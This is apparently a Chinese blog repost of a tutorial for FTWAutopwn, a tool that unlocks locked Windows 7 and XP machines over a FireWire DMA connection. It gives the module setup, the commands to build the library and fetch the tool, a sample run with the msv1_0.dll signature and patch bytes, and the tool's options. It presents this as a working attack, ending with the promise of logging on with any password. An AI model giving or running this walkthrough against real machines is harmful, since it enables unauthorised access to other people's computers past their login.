现在的位置: 首页 > 综合 > 正文

Fire through the wire

2014年02月25日 ⁄ 综合 ⁄ 共 3611字 ⁄ 字号 评论关闭

The last days I’ve been working on an alternative to winlockpwn(unlockinglocked Windows boxes through FireWire SBP2 DMA) using libforensic1394. Now I’vereleased an alpha version of the tool, Fire Through the Wire Autopwn (FTWAutopwn)
atgithub
. So here’s how to use it:


Check that your distro uses the new IEEE1394 stack  如果机器没有1394就别玩了

$ ls /dev | grep fw

插曲:通过lsmod | grep 1394 命令可以查看加载项

If the new stack is loaded and the system has at least one FireWire port then `fw0`should be printed. Additional ports/devices will take the form fw<n>. If no devices are listed then it is likely that the new stack is not loaded.
That sucks, try this command if you’re running Debian/Ubuntu:

$ sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394

$ sudo modprobe firewire-ohci

modprobe

功能说明:自动处理可载入模块。

参数
-a或--all 载入全部的模块。   
-c或--show-conf 显示所有模块的设置信息。   
-d或--debug 使用排错模式。  
-l或--list 显示可用的模块。   
-r或--remove 模块闲置不用时,即自动卸载模块。   
-t或--type 指定模块类型。  
-v或--verbose 执行时显示详细的信息。   
-V或--version 显示版本信息。   
-help 显示帮助。


Download and install libforensic1394

sudo apt-get install git cmake python3
wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz  

(you can also get
libforensic1394-0.2.tar.gz at : http://download.csdn.net/source/3573898)

tar xvf libforensic1394-0.2.tar.gz
cd libforensic1394-0.2
mkdir build
cd build
cmake -G "Unix Makefiles" ../
make
sudo make install
cd ../python
sudo python3 setup.py install

(if you don't have cmake or your cmake version is too old and occures error ,please read another article : http://blog.csdn.net/wangjiannuaa/article/details/6747042 ; and , your default python perhaps not version3 , you can type
the command : apt-get install python3-minimal)


Download and use FTWAutopwn

cd

git clone https://github.com/carmaa/FTWAutopwn.git

cd FTWAutopwn

python3 ftwautopwn.py

注:不一定用git,可以直接去网站下载:https://github.com/carmaa/FTWAutopwn

如果报错是环境变量问题。cannot open shared object file:No such file or dir....

把安装的libforensic1394的lib目录添加进来:export LD_LIBRARY_PATH=/xxx/xxx/lib/xxx(发现不了那个文件的实际目录)

The last command should now work. Hook up your attacking machine to alocked Windows 7 or XP machine using IEEE1394 FireWire cable, and run the above command. Select the correct target, and you’re off!生气

$ python3 ftwautopwn.py

Fire Through the Wire Autopwn v.0.0.1

by Carsten Maartmann-Moe<carsten@carmaa.com> 2011

 

For updates, check outhttps://github.com/carmaa/FTWAutopwn

[+] Available targets:

[1] Win7 32-bit msv1_0.dll technique

[2] Win7 64-bit msv1_0.dll technique

[3] WinXP SP2 msv1_0.dll technique

[4] WinXP SP3 msv1_0.dll technique

Please select target: 4

[+] You have selected: WinXP SP3 msv1_0.dlltechnique

   Using signature: 83f8107511b0018b

   Using patch: 83f8109090b0018b

   Using offset: 2146

[+] Searching for signature,   12 MiB so far.

[+] Signature found at 0xd7d862.

[+] Write-back verified; patchingsuccessful. Bon voyage!


You should now be able to log onto your target machine with any password.


Full syntax is provided by using the -h/–help switch:

$ python3 ftwautopwn.py -h

Fire Through the Wire Autopwn v.0.0.1

by Carsten Maartmann-Moe<carsten@carmaa.com> 2011

 

For updates, check outhttps://github.com/carmaa/FTWAutopwn

Usage: ftwautopwn [OPTIONS]

 

   -d --delay=TIME:      Delay attackby TIME seconds. This is useful in order

                          to guarantee that thetarget machine has successfully

                          installed the SBP2device before attacking. If the

                          attack fails, try toincrease this value.

   -f --file=FILE:       Use a fileinstead of FireWire bus data as input; for

                          example to facilitateattacks on VMware machines or

                          to ease testing andsignature generation efforts

   -h, --help:           Displays this message

   -l, --list:           Listsavailable target operating systems

   -n, --no-write:       Dry run, donot write back to memory

   -t TARGET, --target=TARGET:

                          Specify targetoperating system (use --list to list

                          available targets)

   -v/--verbose:         Verbose mode

 

抱歉!评论已关闭.